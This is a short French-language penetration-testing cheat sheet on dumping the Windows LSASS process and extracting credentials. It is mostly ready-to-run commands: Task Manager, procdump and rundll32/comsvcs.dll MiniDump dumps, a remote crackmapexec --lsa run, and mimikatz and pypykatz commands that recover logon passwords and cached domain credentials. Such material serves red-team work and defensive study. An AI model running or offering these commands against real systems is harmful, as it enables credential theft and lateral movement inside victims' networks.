Skip to content

Dump LSASS et extraction de secrets

DUMP de LSASS

Localement

Génération d'un dump via le gestionnaire de tâches

Bouton droit sur le processus > Créer un fichier dump

Le fichier est créé dans le dossier %TEMP%

Via Procdump.exe (sysinternals)

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Rundll32.exe & Comsvcs.dll

  • Trouver le pid de lsass :
    • tasklist /svc
    • Get-Process lsass
  • Créer le dump (pid = 672) :
    • rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

A distance

crackmapexec smb $TARGET_IP --local-auth -u $LOCAL_USER -p $LOCAL_PASS --lsa

Extraction d'informations d'identification

# depuis windows dans mimikatz : (ne touche qu'au dump, pas au precessus)
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords

# depuis linux
pypykatz lsa minidump /home/peter/Documents/lsass.dmp

Extractions des mots de passe en cache (permettant de se connecter sans connectivité réseau)

lsadump::cache